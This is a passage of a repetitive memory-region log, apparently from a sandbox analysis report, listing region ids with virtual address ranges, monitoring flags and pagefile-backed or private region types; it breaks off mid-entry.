0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8933 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8934 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8935 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8936 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8937 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8938 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8939 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8940 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8941 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8942 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8943 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8944 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8945 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8946 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8947 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8948 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8949 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8950 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8951 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8952 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8953 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8954 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8955 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8956 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8957 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8958 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8959 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8960 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8961 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8962 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8963 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8964 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8965 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8966 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8967 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8968 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8969 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8970 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8971 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8972 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8973 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8974 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8975 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8976 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8977 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8978 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8979 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8980 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8981 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8982 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8983 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8984 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8985 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8986 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8987 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8988 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8989 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8990 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8991 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8992 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8993 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8994 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8995 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8996 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8997 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8998 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8999 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9000 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9001 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9002 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9003 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9004 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9005 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9006 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9007 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9008 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9009 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9010 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9011 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9012 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9013 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9014 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9015 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9016 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9017 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9018 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9019 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9020 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9021 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9022 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9023 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9024 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9025 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9026 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9027 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9028 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9029 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9030 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9031 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9032 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9033 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9034 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9035 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9036 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9037 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9038 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9039 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9040 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9041 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9042 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9043 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9044 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9045 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9046 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9047 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9048 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9049 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9050 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9051 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9052 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9053 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9054 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9055 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9056 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9057 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9058 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9059 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9060 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9061 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9062 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9063 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9064 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9065 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9066 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9067 start_va = 0x44f0000 end_va = 0x4507fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9068 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9069 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9070 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9071 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9072 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9073 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9074 start_va = 0x44f0000 end_va = 0x4501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9075 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9076 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9077 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9078 start_va = 0x44f0000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 9079 start_va = 0x44f0000 end_va = 0x450bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 9080 start_va = 0x4510000 end_va = 0x451dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004510000" filename = "" Region: id = 9081 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9082 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9083 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9084 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9085 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9086 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9087 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9088 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9089 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9090 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9091 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9092 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9093 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9094 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9095 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9096 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9097 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9098 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9099 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9100 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9101 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9102 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9103 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9104 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9105 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9106 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9107 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9108 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 9109 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 9110 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = 